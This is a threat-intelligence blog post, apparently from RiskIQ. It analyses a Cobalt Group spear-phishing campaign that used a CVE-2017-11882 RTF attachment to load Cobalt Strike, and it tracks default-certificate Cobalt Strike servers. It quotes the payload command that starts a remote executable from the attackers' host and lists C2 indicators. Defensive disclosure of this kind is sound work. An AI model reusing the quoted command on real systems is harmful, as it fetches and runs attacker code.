Your organization’s leadership is 12 times more likely to be the target of a security incident and nine times more likely to be the target of a data breach than they were last year. Find out how they can be protected.
Read the Datasheet
Gift Cardsharks: The Massive Threat Campaigns Circling Beneath the Surface
Learn about the attack group primarily targeting gift card retailers and the monetization techniques they use.
Get the Report
Threat Hunting Workshop Series
Join one of our security threat hunting workshops to get hands-on experience investigating and remediating threats.
Attend an Upcoming Workshop
Inside Magecart: New RiskIQ & Flashpoint Research Report
Learn about the groups and criminal underworld behind the front-page breaches.
Threat Hunting Guide: 3 Must-Haves for the Effective Modern Threat Hunter
The threat hunting landscape is constantly evolving. Learn the techniques, tactics, and tools needed to become a highly-effective threat hunter.
In a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up much more information than they intended.
On Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to ‘SWIFT’ terms, the email contained a single attachment with no text in the body. It was an attempt by the Cobalt Group to gain a foothold in the networks of the targeted individuals’ organizations:
Fig-1 What the targets saw
However, rather than putting their targets in BCC, the attackers put the entire list in the ‘TO’ field allowing us to see their full list of intended targets. This isn’t the first time we’ve seen attackers make this error—back in March, an attack focussing on 1,880 targets across financial institutions in Kazakhstan had the same flaw.
Fig-2 As first seen on Twitter
The attachment in the email is an RTF document abusing the recently disclosed exploit referred to as CVE-2017-11882 which is capable of leveraging Office 2007 to 2016 to execute code. The file ‘Swift changes.rtf’ uses this exploit to start a remote payload like so:
cmd /c start \\126.96.36.199\w\w.exe &AAAAAC
The payload is a stager for a tool known as ‘Cobalt Strike’ which, normally, is used in red teaming and pen testing engagements. The framework has gained some notoriety with adversaries as it’s been used in multiple attacks against financial institutions in the past.
The Cobalt Strike beacon eventually connects to 188.8.131.52 which is the group’s command and control server for this attack. A very detailed analysis of the Cobalt Group’s activities and the way they operate can be found here: [ Cobalt strikes back: an evolving multinational threat to finance ].
We won’t be disclosing the recipients of the email, but we will take a look at the targeting from a geographical perspective. The majority of targeting was focused on Turkey and Russia, but there was also a broad attempt at a compromise, targeting employees of one financial institution in eight different countries.
Our list of countries in which employees were targeted includes the United States, Netherlands, Italy, Austria, Ukraine, Turkey, Ukraine, Russia, Jordan, Kuwait, and the Czech Republic:
Fig-3 Targeted countries highlighted in red
One thing we noticed when analyzing the targets of this campaign was that there were a lot of direct employee email addresses on the list, which make their emails more convincing. More interesting is that the majority of these email addresses were found simply by Googling for email addresses for the financial institution making it likely the attackers used open source intelligence to gather their list of targets, and no prior information was needed to get the addresses.
At RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we’ve seen them. What’s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint: 6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c
Fig-4 SSL data inside RiskIQ Community
What we find is that at least a 100 different hosts seem to have been running an HTTPS server with the same certificate. If we jump over to our SIS API, we find that there have been 816(!) hosts running an HTTPS server with this certificate—all Cobalt Strike servers using a default certificate. To ensure our findings were correct, we confirmed them with previously reported threats that involved Cobalt Strike.
From the data gathered through SIS, we can create some statistics on the setup of these Cobalt Strike servers. Port usage:
Below is the amount of Cobalt Strike servers actively seen in our data from June 2015 until March 2016:
Fig-5 Instances of Cobalt Strike servers detected by RiskIQ
One thing to keep in mind is that Cobalt Strike is not always used by adversaries with malicious intent. Formally, Cobalt Strike is sold as a toolset for pen testing and red teaming engagements.
We’ve put all the hosts we’ve seen running Cobalt Strike with a default SSL certificate in a RiskIQ Community project. The SSL certificate is also included in this set: https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3
The following IOCs are only related to the above spear-phishing campaign. The larger set of Cobalt Strike servers we identified can be found in this RiskIQ Community Project mentioned in the previous section.
RiskIQ gathers petabytes of data through crawling the entire internet and has amassed data sets that include SSL certificates and many more. SSL certificates can provide context by showing whether a domain or IP is legitimate based on its certificate, identify self-signed certificates versus third-party authority, and identify IP clusters and additional certificates based on shared certificates. Click here for more information about how analysts can use SSL certificates to connect disparate malicious network infrastructure.
Track the IOCs from this attack, including those listed above, in the RiskIQ Community Project located here.
We're #ThreatHunting in D.C.! The #infosec community is out in force to learn how to supercharge their investigations with RiskIQ's advanced data sets inside the @PassiveTotal platform.
Via @Forbes, RiskIQ research finds over 18,000 websites infested with #Magecart card-skimming #malware https://t.co/dKSfziG3dr #ecommerce
Just Launched! Adam Hunt of @riskIQ and Fredrik Nilsson of @axisipvideo discuss #cybersecurity, #IoT, and the threat of regulatory fines from #dataprivacy breaches on the latest Inside @ForbesCouncils #podcast! https://t.co/G0UoPfQCHf
We're here at #sector2019! Swing by booth #406 to find out everything new with security outside the firewall, and find out how to start defending your internet attack surface today.